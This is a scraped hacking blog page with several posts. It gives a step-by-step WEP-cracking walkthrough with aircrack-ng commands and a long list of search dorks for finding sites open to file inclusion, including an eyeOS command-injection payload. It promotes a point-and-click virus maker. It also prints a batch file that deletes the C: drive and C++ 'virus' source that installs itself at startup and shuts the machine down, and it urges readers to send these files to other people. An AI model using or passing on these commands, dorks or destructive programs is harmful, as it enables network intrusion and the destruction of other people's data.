Using Dynamic IP as Static IP

Everyone Like to send Anonymous Mail to your enemy or friend or teacher. Here is the Hacking tutorial for you to implement that. So i hope This will be best hack for you.

DNN METHOD COMPLETE TUTORIAL HOW TO HACK A WEB SITE WITH ASP SHELL

This is default featured post 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured post 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured post 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

Sunday 19 June 2011

How to Hack WiFi (WEP) Using Backtrack 4


1. Boot Live CD/DVD of BackTrack 4. After it boots, type in "startx" to start GUI

2. Open new Konsole (backtrack's terminal).

3. Type, not using qoutes, "airodump-ng wlan0". Now find the network you want to attack. Copy the BSSID and the channel (write down on piece of paper and keep handy)

4. Open new Konsole, type "airodump-ng -w wep -c 11 --bssid 00:24:b2:80:d7:3c wlan0"   **X & 00:24:b2:80:d7:3c are examples of the channel and bssid you should have copied**

5. You are now fixed on to the network you want to attack.

6. Close the first Konsole, open a new Konsole and type "aireplay-ng -1 0 -a 00:24:b2:80:d7:3c wlan0"  **00:24:b2:80:d7:3c is an example as well**

7. Open another new Konsole, type "aireplay-ng -3 -b 00:24:b2:80:d7:3c wlan0"  **00:24:b2:80:d7:3c example"

8. Go to first Konsole, wait for the Data to reach to 30,000; go to 3rd Konsole, hit CNTL + C, then type in "dir", hit enter

9. Type "airecrack-ng wep.01.cap", hit enter.

10. Let it run its course, should only take a few moments. Once key is found, it will show up with semi-colons in it. Take out the semi-colons, and this will be the key. (Example of key; 53:06:66:51:50, so it will be 5306665150)

11. Enjoy Hacking, Enjoy Hackton.

Complete List Of RFi and LFI dorks




    RFI(Local File Inclusion)

    inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=


    inurl:/include/new-visitor.inc.php?lvc_include_dir=


    inurl:/_functions.php?prefix=


    inurl:/cpcommerce/_functions.php?prefix=


    inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=


    inurl:/modules/agendax/addevent.inc.php?agendax_path=


    inurl:/ashnews.php?pathtoashnews=


    inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=


    inurl:/pm/lib.inc.php?pm_path=


    inurl:/b2-tools/gm-2-b2.php?b2inc=


    inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=


    inurl:/modules/agendax/addevent.inc.php?agendax_path=


    inurl:/includes/include_once.php?include_file=


    inurl:/e107/e107_handlers/secure_img_render.php?p=


    inurl:/shoutbox/expanded.php?conf=


    inurl:/main.php?x=


    inurl:/myPHPCalendar/admin.php?cal_dir=


    inurl:/index.php/main.php?x=


    inurl:/index.php?include=


    inurl:/index.php?x=


    inurl:/index.php?open=


    inurl:/index.php?visualizar=


    inurl:/template.php?pagina=


    inurl:/index.php?pagina=


    inurl:/index.php?inc=


    inurl:/includes/include_onde.php?include_file=


    inurl:/index.php?page=


    inurl:/index.php?pg=


    inurl:/index.php?show=


    inurl:/index.php?cat=


    inurl:/index.php?file=


    inurl:/db.php?path_local=


    inurl:/index.php?site=


    inurl:/htmltonuke.php?filnavn=


    inurl:/livehelp/inc/pipe.php?HCL_path=


    inurl:/hcl/inc/pipe.php?HCL_path=


    inurl:/inc/pipe.php?HCL_path=


    inurl:/support/faq/inc/pipe.php?HCL_path=


    inurl:/help/faq/inc/pipe.php?HCL_path=


    inurl:/helpcenter/inc/pipe.php?HCL_path=


    inurl:/live-support/inc/pipe.php?HCL_path=


    inurl:/gnu3/index.php?doc=


    inurl:/gnu/index.php?doc=


    inurl:/phpgwapi/setup/tables_update.inc.php?appdir=


    inurl:/forum/install.php?phpbb_root_dir=


    inurl:/includes/calendar.php?phpc_root_path=


    inurl:/includes/setup.php?phpc_root_path=


    inurl:/inc/authform.inc.php?path_pre=


    inurl:/include/authform.inc.php?path_pre=


    inurl:index.php?nic=


    inurl:index.php?sec=


    inurl:index.php?content=


    inurl:index.php?link=


    inurl:index.php?filename=


    inurl:index.php?dir=


    inurl:index.php?document=


    inurl:index.php?view=


    inurl:*.php?sel=


    inurl:*.php?session=&content=


    inurl:*.php?locate=


    inurl:*.php?place=


    inurl:*.php?layout=


    inurl:*.php?go=


    inurl:*.php?catch=


    inurl:*.php?mode=


    inurl:*.php?name=


    inurl:*.php?loc=


    inurl:*.php?f=


    inurl:*.php?inf=


    inurl:*.php?pg=


    inurl:*.php?load=


    inurl:*.php?naam=


    allinurl:/index.php?page= site:*.dk


    allinurl:/index.php?file= site:*.dk


    INURL OR ALLINURL WITH:


    /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=


    /includes/header.php?systempath=


    /Gallery/displayCategory.php?basepath=


    /index.inc.php?PATH_Includes=


    /ashnews.php?pathtoashnews=


    /ashheadlines.php?pathtoashnews=


    /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=


    /demo/includes/init.php?user_inc=


    /jaf/index.php?show=


    /inc/shows.inc.php?cutepath=


    /poll/admin/common.inc.php?base_path=


    /pollvote/pollvote.php?pollname=


    /sources/post.php?fil_config=


    /modules/My_eGallery/public/displayCategory.php?basepath=


    /bb_lib/checkdb.inc.php?libpach=


    /include/livre_include.php?no_connect=lol&chem_absolu=


    /index.php?from_market=Y&pageurl=


    /modules/mod_mainmenu.php?mosConfig_absolute_path=


    /pivot/modules/module_db.php?pivot_path=


    /modules/4nAlbum/public/displayCategory.php?basepath=


    /derniers_commentaires.php?rep=


    /modules/coppermine/themes/default/theme.php?THEME_DIR=


    /modules/coppermine/include/init.inc.php?CPG_M_DIR=


    /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=


    /coppermine/themes/maze/theme.php?THEME_DIR=


    /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=


    /allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=


    /myPHPCalendar/admin.php?cal_dir=


    /agendax/addevent.inc.php?agendax_path=


    /modules/mod_mainmenu.php?mosConfig_absolute_path=


    /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=


    /main.php?page=


    /default.php?page=


    /index.php?action=


    /index1.php?p=


    /index2.php?x=


    /index2.php?content=


    /index.php?conteudo=


    /index.php?cat=


    /include/new-visitor.inc.php?lvc_include_dir=


    /modules/agendax/addevent.inc.php?agendax_path=


    /shoutbox/expanded.php?conf=


    /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=


    /pivot/modules/module_db.php?pivot_path=


    /library/editor/editor.php?root=


    /library/lib.php?root=


    /e107/e107_handlers/secure_img_render.php?p=


    /zentrack/index.php?configFile=


    /main.php?x=


    /becommunity/community/index.php?pageurl=


    /GradeMap/index.php?page=


    /index4.php?body=


    /side/index.php?side=


    /main.php?page=


    /es/index.php?action=


    /index.php?sec=


    /index.php?main=


    /index.php?sec=


    /index.php?menu=


    /html/page.php?page=


    /page.php?view=


    /index.php?menu=


    /main.php?view=


    /index.php?page=


    /content.php?page=


    /main.php?page=


    /index.php?x=


    /main_site.php?page=


    /index.php?L2=


    /content.php?page=


    /main.php?page=


    /index.php?x=


    /main_site.php?page=


    /index.php?L2=


    /index.php?show=


    /tutorials/print.php?page=


    /index.php?page=


    /index.php?level=


    /index.php?file=


    /index.php?inter_url=


    /index.php?page=


    /index2.php?menu=


    /index.php?level=


    /index1.php?main=


    /index1.php?nav=


    /index1.php?link=


    /index2.php?page=


    /index.php?myContent=


    /index.php?TWC=


    /index.php?sec=


    /index1.php?main=


    /index2.php?page=


    /index.php?babInstallPath=


    /main.php?body=


    /index.php?z=


    /main.php?view=


    /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=


    /index.php?file=


    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=




    1. allinurl:my_egallery site:.org
    /modules/My_eGallery/public/displayCategory.php?basepath=


    2. allinurl:xgallery site:.org
    /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=


    3. allinurl:coppermine site:.org
    /modules/coppermine/themes/default/theme.php?THEME_DIR=


    4. allinurl:4nAlbum site:.org
    /modules/4nAlbum/public/displayCategory.php?basepath=


    5. allinurlP:NphpBB2 site:.org
    /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=


    6. allinurl:ihm.php?p=


    7. Keyword : "powered by AllMyLinks"
    /include/footer.inc.php?_AMLconfig[cfg_serverpath]=


    8. allinurl:/modules.php?name=allmyguests
    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=


    9. allinurl:/Popper/index.php?
    /Popper/index.php?childwindow.inc.php?form=


    10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
    yahoo = by Kietu? v 3.2
    /kietu/index.php?kietu[url_hit]=


    11. keyword : "Powered by phpBB 2.0.6"
    /html&highlight=%2527.include($_GET[a]),exit.%2527&a=


    12. keyword : "powered by CubeCart 3.0.6"
    /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=


    13. keyword : "powered by paBugs 2.0 Beta 3"
    /class.mysql.php?path_to_bt_dir=


    14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php
    /ashnews.php?pathtoashnews=


    15. keyword : /phorum/login.php
    /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=


    16. allinurl:ihm.php?p=*


    14. keyword : "powered eyeOs"
    /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cm d=id
    diganti dengan :
    /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5b a%5d);&a=


    15. allinurl:.php?bodyfile=


    16. allinurl:/includes/orderSuccess.inc.php?glob=
    /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=


    17. allinurl:forums.html
    /modules.php?name=


    18. allinurl:/default.php?page=home


    19. allinurl:/folder.php?id=


    20. allinurl:main.php?pagina=
    /paginedinamiche/main.php?pagina=


    21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")
    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=


    22. allinurl:application.php?base_path=
    /application.php?base_path=


    23. allinurlp:hplivehelper
    /phplivehelper/initiate.php?abs_path=


    24. allinurlp:hpnuke
    /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=


    25. key word : "powered by Fantastic News v2.1.2"
    /archive.php?CONFIG[script_path]=


    26. keyword: "powered by smartblog" AND inurl:?page=login
    /index.php?page=


    27. allinurl:/forum/
    /forum/admin/index.php?inc_conf=


    28. keyword:"Powered By FusionPHP"
    /templates/headline_temp.php?nst_inc=


    29. allinurl:shoutbox/expanded.php filetypep:hp
    /shoutbox/expanded.php?conf=


    30. allinurl: /osticket/
    /osticket/include/main.php?config[search_disp]=true&include_dir=


    31. keyword : "Powered by iUser"
    /common.php?include_path=


    32. allinurl: "static.php?load="
    /static.php?load=


    33. keyworld : /phpcoin/login.php
    /phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=


    34. keyworld: allinurl:/phpGedview/login.php site:
    /help_text_vars.php?dir&PGV_BASE_DIRECTORY=


    35. allinurl:/folder.php?id=
    /classes.php?LOCAL_PATH=



    LFI(Local File Inclusion)


    acion=
    act=
    action=
    API_HOME_DIR=
    board=
    cat=
    client_id=
    cmd=
    cont=
    current_frame=
    date=
    detail=
    dir=
    display=
    download=
    f=
    file=
    fileinclude=
    filename=
    firm_id=
    g=
    getdata=
    go=
    HT=
    idd=
    inc=
    incfile=
    incl=
    include_file=
    include_path=
    infile=
    info=
    ir=
    lang=
    language=
    link=
    load=
    main=
    mainspot=
    msg=
    num=
    openfile=
    p=
    page=
    pagina=
    path=
    path_to_calendar=
    pg=
    plik
    qry_str=
    ruta=
    safehtml=
    section=
    showfile=
    side=
    site_id=
    skin=
    static=
    str=
    strona=
    sub=
    tresc=
    url=
    user=

Default passwords for Access Points


Here s a huge list of Default Passwords for Access Point Devices.


Top 10 Essential tools for Hacking Wireless Networks


As with any trade, it’s essential to have the right tools when testing your wireless network for security  vulnerabilities. Here are ten tools i m including that will assist you to increase the throughput of yur pen test.

Laptop Computer
For starters, you’ve got to a have a good test system — preferably a portable laptop computer. Although it is possible to perform wireless-security testing using a handheld device such as a Pocket PC, the tools available on such devices are limited compared to those on a laptop system.
Due to the multiple operating system requirements of the popular wireless testing tools, we recommend using either a system that can dual boot Windows (preferably 2000 or XP) and Linux (any recent distribution will do) or a Windows-based system running a virtual machine program (such as VMware) on which you can install multiple operating systems. The hardware requirements  for systems running a single operating system are pretty minimal given today’s standards. A system with a Pentium III or equivalent processor, 256MB RAM, and at least a 30–40GB hard drive should be more than enough. If you’ll be running VMware or another virtual machine program, you’ll want to at least double this amount of RAM and hard drive space.


Wireless Network Card

In addition to the laptop, you’ve got to have a good wireless network-interface card (NIC). Look for a PC Card NIC that’s not only compatible with the various wireless tools, but one that also has a connector for an external antenna so you can pick up more signals. The Orinoco Gold card (and its re-badged equivalents) serves both purposes very well. Many wireless NICs built in to today’s laptops are good general purpose cards, but your test results may be limited due to the shorter radio range capability of the internal antennas.


Antennas and Connecting Cables
A high-gain unidirectional or omnidirectional antenna — or cantenna — will do wonders for you when you’re scanning your airwaves for wireless systems. When you’re shopping for antennas, look for one with a pigtail connection that matches the type of connector you have on your wireless NIC. Also be aware that the length of these pigtail cables should be kept as short as possible. Because they’re made with a very thin microwave coax, these cables have fairly high signal losses at microwave frequencies and with the connectors placed on either end of the pigtail cable. To avoid high cable losses, you should not use a pigtail cable longer than 5 feet.


GPS Receiver
If you’ll be war-walking/driving/flying — or if your wireless systems span across a large building or campus environment — then it’s time to think globally:  A global positioning satellite (GPS) receiver will come in handy. With a GPS receiver, you’ll be able to integrate your wireless testing software and pinpoint the locations of wireless systems within a few meters.


Stumbling Software
To get your wireless testing rolling, wireless stumbling software is essential; you can use it to map out things like SSIDs, signal strength, and systems using WEP encryption. Software you can use for this includes Network Stumbler for Windows or your wireless NIC management software. For really basic stumbling, you can even use the management software built in to Windows XP.


Wireless Network Analyzer
To probe deep into the airwaves, a network analyzer is essential. Programs such as Kismet, AiroPeek, and ethereal can help you monitor multiple wireless channels, view protocols in use, look for wireless system anomalies — and even capture wireless data right out of thin air.


Port Scanner
A port scanner such as nmap or SuperScan is a great tool for scanning the wireless systems you stumble across to find out more about what’s running and what’s potentially vulnerable.


Vulnerability Assessment Tool
A vulnerability-assessment tool such as Nessus, LANguard Network Security Scanner, or QualysGuard is great for probing your wireless systems further to find out which vulnerabilities actually exist. This information can then be used to poke around further and see what the bad guys can see and even potentially exploit.


Google
It’s not only a great reference tool, but the Google search engine can also be used for searching Network  Stumbler .NS1 files, digging in to the Web-server software built in to your APs, finding new wireless-security testing tools, researching vulnerabilities, and more. The Google taskbar (downloadable for Internet Explorer, built in to FireFox) makes your searching even easier.


An 802.11 Reference Guide
While performing ongoing ethical hacks against your wireless systems, you’ll undoubtedly need a good reference guide on the IEEE 802.11 standards at some time or another. The 802.11 wireless protocol is very complex and will evolve over time. You’ll likely need to look up information on channel frequency ranges, what a certain type of packet is used for, or perhaps a default 802.11 setting or two. The Cheat Sheet, the wireless resources found in Appendix A in this book, as well as Peter’s book Wireless

How to Reset Your BIOS Password



Well guys, Here's a DOS trick for Windows 9x, that will reset (delete) your motherboard's BIOS password (aka CMOS password) without any need to open up your computer to remove the battery or mess with jumpers.

This method can come in very handy in the event you ever lose and forget your BIOS password or if you acquire used computers where the unknown previous owners had BIOS passwords set (in fact, this happened to me long ago—I was given a used computer, but there was no way I could enter the CMOS to make changes). It's important to note here that the password we are talking about is only the one that prevents a user from entering the BIOS setup at bootup, not the one that stops you from getting past the boot.

Normally, at bootup you can press a key (usually the DEL key) to access your BIOS allowing you to view it or make changes. With a password set, there is no way to enter setup. Though a password can provide a basic and very effective level of PC security, losing it can be a real headache if you don't know how to fix the problem.

The MS-DOS command that will makes this trick possible is the DEBUG command (debug itself is a utility—debug.exe—which is located in your Windows Command folder). This is not a command to be taken lightly—in other words, it's not a command to play with! You can cause serious corruption with this command and can end up not being able to even boot your computer! Debug is used to work with binary and executable files and allows you to alter (hex edit) the contents of a file or CPU register right down to the binary and byte level.

To begin debug mode, type debug at a MS-DOS prompt or you can specify a file, i.e., DEBUG FILE.EXE. There is a difference in screen output between the two methods. When you type DEBUG alone, debug responds with a hyphen (-) prompt waiting for you to enter commands. The second method, with a file specified, loads the file into memory and you type all the commands on the line used to start debug. In this tip, we will be writing to the BIOS, so the first method is the one that would be used. All debug commands can be aborted at any time by pressing CTRL/C.

Accessing BIOS with DEBUG
The basic trick will be to fool the BIOS into thinking there is a checksum error, in which case it resets itself, including the password. This is done by invalidating the CMOS and to do that we must know how to access the BIOS and where the checksum value of the CMOS is located so that we can change it. Access to the the BIOS content is via what are known as CMOS Ports and it's Port 70 and 71 that will give us the needed access. On almost all AT motherboards, the checksum is located at hexadecimal address 2e and 2f and filling the address 2e with ff is all you should have to do to invalidate the checksum.

Here's what to do if you ever need to reset the password and have no other method, and you don't want to open up your computer to remove the battery or jumpers.

Note! Do this at your own risk. I can only tell you that it has worked for me more than once and has worked for others as well. But I cannot make any guarantees. When I did this, I took a willing risk. The BIOS was Award Modular BIOS v4.51PG

Restart your computer in MS-DOS mode.


When you get to the C:\> or C:\WINDOWS> prompt, type DEBUG and press Enter.


A hyphen (-) prompt will appear waiting for you to enter commands.


Enter the following commands, pressing Enter after each one. Note: the o is the letter o and stands for OUTPUT.


o 70 2e


o 71 ff


q


After the q command (which stands for QUIT), enter Exit.


Then try to enter your BIOS at bootup. The password prompt should now be gone and you should now have full access to it again. However, you will now be at the default BIOS setttings and may want to change them to your preference. You may also want to have your drives autodetected again.


In closing, I should state that in the case of a lost BIOS password, your first step should always be to contact your manufacturer to see if a backdoor password is available that will allow you to bypass the forgotten password.

There are many sites on the net that list backdoor passwords you can try, but beware that some BIOS that are set up to lock up if you enter the wrong password more than a certain number of times, usually only 3 times!

Terabit Virus Maker - Create virus easily without programming skills

TeraBIT Virus Maker

King of Hackers as you know friends , since its inception has always been a blog that reports on topics of general interest computer without malice and all legal. However, the topic of today is somewhat unusual, sure many will call them enough attention. It is in this sense that I clarify that this post is for the sole purpose of informing them and prevent themabout how easy it is today to create viruses , but not so recommend a program to develop and begins to spread virus to the computing community, that not here. That said, let's start:

Why do we say today is possible without programming skills to create virus ? Just because a program has been developed to facilitate this task, the application is called "Terabit Virus Maker "and has been developing since 2007 and is today that has been perfected to such an extent that even a child could create a virus just a few clicks . The bad (or good for many) is that this program is freeware , ie it is distributed free to reach any person, very risky if you're not careful, even for those who use it.

As shown in the above screenshot, the interface is in English, however it is intuitive to use, the following image (v. 2.8) I found shows the translation into Spanish on the attacks that can be defined to create the virus:


As you saw, just select only the actions that make our virus, assign a name and choose an icone to camouflage. It's that simple!
Terabit Virus Maker is a very dangerous dear friends , so if you think I recommend using it before having knowledge about the virus and are well informed about the precautions to be taken in the team , mostly talk about others users to use their computer , so it does not unintentionally self-infect yourself. In any case, " Deep Freeze "(fee) or" Wonder share Time Freeze "(free), are the best ways to prevent infection and / or system damage.


DOWNLOAD

OR
DOWNLOAD @

Make Simple Virus ( C Formatter )



Copy this and type in notepad ! This Virus is Undetectable from Antivirus too..!


@Echo off
Del C:\ *.* |y 



And save that as .bat not .txt and RUN IT
It will delete the content of C:\ drive...

PLEASE NoTe  =  dont run that .bat file on ur system .... it will delete Your 'C'
AnyOne Dare To Run This will Delete all His C Disk > Beware 
EVEN I DIDN't TRY THIS........

I WILL NOT RESPONSIBLE FOR ANYTHING

Matrix Virus

 
 
Warning - Do not run it on your computer

I'm gonna teach you how to make a virus named 
=|:|:|:|:|:|Matrix|:|:|:|:|:|=
1-Open notepad
2-Put in this code


// The Matrix Virus
// Created by W3irdo
// Hazuras.com

#include 
#include 
#include 
#include 
#include 
#include 
#include 
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat", ios::app);
fp << "@ECHO OFF n";
fp << "START C:\rawr.exe n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF n";
fp << "COPY matrix.exe C:\rawr.exe n";
fp << "START C:\rawr.exe n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout << setw(4) << num;
cout << setw(4) << "0%";
cout << setw(4) << "P";
cout << setw(4) << " ";
cout << setw(4) << ")";
cout << setw(4) << "#";
cout << setw(4) << "X";
cout << setw(4) << "@";
cout << setw(4) << "1&";
cout << setw(4) << "*";
cout << setw(4) << "||";
cout << setw(4) << " ";
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
}
goto START;





3-save it as matrix.bat
4-finish

Then complete using this....

and upload anywhere in the share links and send to others and enjoy

Top 10 Most Dangerous BotNets, Malware [Fix]



Botnet is a collection of software robots, or bots, that run automatically. It is often associated with malicious software over network of computers using distributed computing. While botnets are often named after their malicious software name, there are typically multiple botnets in operation using the same malicious software families, but operated by different criminal entities.
While the term “botnet” can be used to refer to any group of bots, such as IRC bots, this word is generally used to refer to a collection of compromised computers (called Zombie computers) running software, usually installed via drive-by downloads exploiting Web browser vulnerabilities, worms, Trojan horses, or backdoors, under a common command-and-control infrastructure.
The bad news is that, Botnet attacks are increasing, as cybercrime gangs use compromised computers to send spam, steal personal data, perpetrate click fraud and clobber Web sites in denial-of-service attacks. Here’s a list of America’s 10 most wanted botnets, based on an estimate by security firm Damballa of botnet size and activity in the United States.
Though most of them can be removed by most Antivirus softwares but not all vendors support removal ofall. So I’ve mentioned links where you can find steps for easy removal/ prevention of the specified Botnets
BotNets are more serious problem than you can think of. The no. of infected PCs (and users don’t have an idea about it) are increasing day-by-day.
So let’s raise the awareness by discussing Top 10 among the 100s, Ranked by size and strength of damage in the Increasing Order.
No. 10: Conficker 
Compromised Computers: 210,000
This downloader worm has spread significantly throughout the world, though not so much in the U.S., its also called Downadup.  It’s a complex downloader used to propagate other malware. Though it has been used to sell fake antivirus software, this crimeware currently seems to have no real purpose other than to spread. Industry watchers fear a more dangerous purpose will emerge.
No. 9: Gammima
Also know as Gamina, Gamania, Frethog, Vaklik and Krap. This one focuses on stealing online game logins, passwords and account information. It uses rookit  techniques to load into the address space of other common processes, such as Windows Explorer.exe, and will spread through removable media such as USB keys. It’s also known to be the worm that got into the International Space Station in the summer of 2008.
No. 8: Swizzor
Compromised U.S. computers: 370,000
A variant of the Lop malware, this Trojan dropper can download and launch files from the Internet on the victim’s machine without the user’s knowledge, installing an adware program and other Trojans.
No. 7: Hamweq
Compromised U.S. computers: 480,000
Also known as IRCBrute, or an autorun worm, this backdoor worm makes copies of itself on the system and any removable drive it finds — and anytime the removable drives are accessed, it executes automatically. An effective spreading mechanism, Hamweq creates registry entries to enable its automatic execution at every startup and injects itself into Explorer.exe. The botmaster using it can execute commands on and receive information from the compromised system.
No. 6: Monkif
Compromised U.S. computers: 520,000
This crimeware’s current focus is downloading an adware BHO (browser helper object) onto a compromised system.
How to Avoid/Fix: AVG fixes it
No. 5: TR/Dldr.Agent.JKH
Compromised U.S. computers: 1.2 million
This remote Trojan posts encrypted data back to its command-and-control domains and periodically receives instruction. Often loaded by other malware, TR/Dldr.Agent.JKH currently is used as a clickbot, generating ad revenue for the botmaster through constant ad-specific activity.
No. 4: Trojan.Fakeavalert
Compromised U.S. computers: 1.4 million
Formerly used for spamming, this botnet has shifted to downloading other malware, with its main focus on fake alerts and roque antivirus software.
No. 3: TidServ
Compromised U.S. computers: 1.5 million
This downloader Trojan spreads through spam e-mail, arriving as an attachment. It uses rootkit techniques to run inside common Windows services (sometimes bundled with fake antivirus software) or in Windows safe mode, and it can hide most of its files and registry entries.
No. 2: Koobface 
Compromised U.S. computers: 2.9 million
This malware spreads via social networking sites like Twitter, MySpace and Facebook with faked messages or comments from “friends.” When a user is enticed into clicking on a provided link to view a video, the user is prompted to obtain a necessary update, like a codec — but it’s really malware that can take control over the computer.
No. 1: Zeus
Compromised U.S. computers: 3.6 million
The Zeus Trojan uses key-logging techniques to steal sensitive data such as user names, passwords, account numbers and credit card numbers. It injects fake HTML forms into online banking login pages to steal user data.
BEST SOLUTION
Keep your antivirus software updated. I recommend changing antivirus/Ad-aware software to a different vendor evey month coz a single one may not catch all.

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More